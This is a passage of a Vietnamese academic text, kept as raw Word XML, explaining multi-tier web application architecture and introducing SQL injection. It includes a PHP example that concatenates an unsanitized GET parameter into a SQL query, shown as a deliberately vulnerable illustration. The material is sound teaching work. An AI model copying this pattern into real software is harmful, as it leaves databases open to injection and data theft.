      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Ứng dụng web sử dụng cơ sở dữ liệu rất phổ biến ngày nay. Thông thường bao gồm một CSDL phía back-end và một trang web chứa các đoạn mã server-side trên máy chủ, có khả năng trích xuất các dữ liệu từ CSDL dựa trên </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>các hành vi, tác động khác nhau của người dung. Một trong những ví dụ rõ nhất là trang thương mại điện tử: Các thông tin về sản phẩm như: tên, giá, số lượng… được lưu trữ trong CSDL. Tùy thuộc vào loại sản phẩ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>m mà người dùng</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> muốn xem, ứng dụng sẽ trả về cho </w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>người dùng</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> thông tin sản phẩm tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Một ứng dụng web cơ bản gồm 3 lớp (three tiers): Lớp trình bày (Presentation Tier) là trình duyệt, hoặc bộ engine hiển thị, Lớp logic (Logic Tier) là ngôn ngữ lập trình hoạt động phía máy chủ như C#, ASP, .NET, PHP, JSP…, Lớp lưu trữ (Storage Tier) là các hệ quản trị CSDL như Microsoft SQL Server, MySQL, Oracle… Trình duyệt web ở lớp trình bày gửi yêu cầu tới lớp trung gian – lớp logic, tạo ra các yêu cầu truy vấn hoặc cập nhật vào CSDL (lớp lưu trữ).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong ví dụ sau, một trang web bán hàng trực tuyến có chức năng cho phép người dùng tìm kiếm/lọc các sản phẩm quan tâm, sắp xếp các sản phẩm, cung cấp tính tùy chọn hiển thị các sản phẩm phù hợp với tài chính, nhu cầu người mua. Để xem tất cả các sản phẩm có giá thấp hơn 100$, người mua sẽ sử dụng URL sau:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>http://www.victim.com/products.php?val=100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. Đoạn mã PHP dưới đây sẽ minh họa các mà đầu vào từ người dùng (tham số val) được truyền vào và tạo ra một câu truy vấn SQL động. Đoạn mã sẽ được thực thi khi người dùng gọi tới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connect to the database</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>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pPr>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pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">$query = "SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> FROM Products WHERE Price &lt; '$_GET["val"]' "."ORDER BY ProductDescription";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>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pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$result = mysql_query($query);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>// iterate through the record set</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>while($row = mysql_fetch_array($result, MYSQL_ASSOC))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts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ab/>
              <w:t>// display the results to the browser</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
              <w:t>echo "Description : {$row['ProductDescription']} &lt;br&gt;".</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
              <w:t>"Product ID : {$row['ProductID']} &lt;br&gt;".</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
              <w:t>"Price : {$row['Price']} &lt;br&gt;&lt;br&gt;";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Đoạn code trên minh họa rõ quá trình PHP script tạo ra câu truy vấn. Câu truy vấn sẽ trả về tất cả sản phẩm có giá thấp hơn 100$ trong CSDL, những sản phẩm này sẽ được hiển thị trên trình duyệt web của người dùng. Về nguyên tắc, tất cả các phương pháp làm việc của ứng dụng web đều hoạt động giống như cách này, hoặc một hình thức tương đương nhằm tạo ra câu truy vấn:</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78"/>
      </w:tblGrid>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="00876FFE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w: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FROM Products</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE </w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Price &lt;’100.00’</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ORDER BY ProductDescription;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F022BA" w:rsidRDefault="00F022BA" w:rsidP="003308DA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003308DA" w:rsidRDefault="003F7098" w:rsidP="003308DA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_GoBack"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23819D5A" wp14:editId="3E7E587E">
            <wp:extent cx="5257800" cy="21374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5257800" cy="2137410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="003308DA" w:rsidRDefault="003308DA" w:rsidP="003308DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc458436413"/>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Mô hình ba lớp đơn giản trong ứng dụng web.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="008E4486">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lớp trình bày là lớp cao nhất của ứng dụng, nó hiển thị các thông tin liên quan</w:t>
      </w:r>
      <w:r w:rsidR="00DB3DB2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">các dịch vụ như hàng hóa, nội dung giỏ hàng, và giao tiếp với những lớp khác để trả  kết quả lên trình duyệt. Tiếp theo lớp trình bày là lớp logic, thực hiện các chức năng của ứng dụng bằng các xử lý chi tiết. Lớp lưu trữ gồm các máy chủ CSDL, dữ liệu sẽ được lưu trữ và lấy ra tại đây. Điều này giúp cho dữ liệu độc lập với ứng dụng và các hoạt động nghiệp vụ. Một nguyên tắc cơ bản là lớp trình bày không bao giờ liên kết trực tiếp với lớp dữ liệu, mà phải đi qua lớp logic trung gian. Khi người dùng sử dụng trình duyệt web truy cập vào URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>http://www.victim.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, máy chủ web server sẽ tải file kịch bản từ file hệ thống, chuyển đến scripting engine để phân tích và thực thi. Đoạn script sẽ thực hiện mở kết nối đến lớp lưu trữ - CSDL qua Database Connector để thực hiện câu truy vấn SQL. CSDL trả về kết quả truy vấn cho Database Connector, chuyển đến cho scripting engine (lớp logic). Lớp logic sẽ thực hiện các ứng dụng, </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nghiệp vụ tương ứng với kết quả truy vấn SQL trước khi trả về trang Web dạng HTML cho trình duyệt web của người dùng. Trình duyệt web sẽ hiển thị HTML dưới dạng hình ảnh, đồ họa sinh động. Toàn bộ quá trình thực thi chỉ trong khoảng vài giây và hoàn toàn trong suốt với người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Mô hình ba lớp không có tính mở rộng, do đó trong những năm gần đây mô hình này đang được đánh giá lại và một mô hình mới được xây dựng có tính mở rộng và bảo trì được xây dựng: mô hình n-lớp. Trong đó, giải pháp mô hình 4-lớp được đưa ra bằng cách sử dụng một lớp trung gian giữa lớp logic và lớp lưu trữ. Một máy chủ ứng dụng trong mô hình n-lớp sẽ cung cấp các API phục vụ các chức năng, hoạt động và được sử dụng bởi ứng dụng. Các máy chủ có thể sử dụng nhiều loại ngôn ngữ. nhiều loại hệ quản trị CSDL khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1015A89A" wp14:editId="29F1D2B8">
            <wp:extent cx="5972175" cy="2107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5972175" cy="210756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9" w:name="_Toc458436414"/>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w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Mô hình ứng dụng 4-lớp.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Mỗi lớp có thể được đặt trên nhiều máy chủ hoặc cùng một máy chủ. Cũng như một máy chủ có thể đặt nhiều lớp. Việc chia thành nhiều lớp nhỏ hơn cho phép dễ dàng mở rộng, phân tách rõ hơn giữa các </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LTV</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, làm cho mã nguồn ứng dụng dễ đọc hơn, cũng như dễ dàng tái sử dụng. Phương pháp này cũng loại bỏ các điểm yếu duy nhất của ứng dụng. Hiện nay, mô hình 3-lớp và 4-lớp đang rất phổ biến trên Internet. Tuy nhiên, như đã nói mô hình n-lớp rất linh hoạt và sẽ cung cấp vô số cách để chia tách và triển khai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc459374310"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Lỗ hổng SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Các ứng dụng web ngày càng trở nên phức tạp hơn. Phạm vi cũng mở rộng từ Internet đến nội bộ, từ các hệ thống thương mại điện tử đến các hệ thống đối tác, hệ thống quản lý. Sự đa dạng của các hệ thống, sự nhạy cảm của các dữ liệu trở nên quan trọng với các doanh nghiệp. Các ứng dụng web cũng vô cùng </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>đa dạng và biến đổi trong các dòng mã nguồn, càng nhiều tính năng càng làm tăng khả năng mắc lỗi của ứng dụng. Ngoài ra, sự phát triển của ngành An toàn thông tin (ATTT), hacker ngày càng tập trung vào việc khai thác, chiếm quyền điều khiển các hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tấn công SQL injection là một kiểu tấn công mà câu lệnh truy vấn SQL được tạo thành từ đầu vào phía người dùng, sau đó chuyển tới máy chủ SQL phía back-end để phân tích và thực thi. Bất kỳ thủ tục để xây dựng mệnh đề truy vấn SQL cũng có khả năng mắc lỗi, giống như sự đa dạng trong các phương pháp lập trình. Một hình thức cơ bản của SQL injection là chèn trực tiếp đoạn mã vào tham số (parameter) được ghép nối với câu truy vấn SQL và thực thi. Một dạng khác ít trực tiếp mà mã tấn công sẽ được tiêm (inject) vào trong một bảng, khi chuỗi này được lấy ra và ghép vào một câu truy vấn SQL động, nó sẽ được thực thi. Khi mà ứng dụng web không thực hiện tiền xử lý – sanitize đầu vào, thành phần sẽ được đưa vào câu truy vấn SQL động, kẻ tấn công sẽ tạo được câu lệnh SQL mong muốn. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Để minh họ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a sẽ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> quay lại với ví dụ cửa hàng trực tuyến, cho phép hiển thị các sản phẩm có giá nhỏ hơn 100$:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="00357C7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://www.victim.com/products.php?val=100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lầ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">n này </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sẽ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiến hành</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
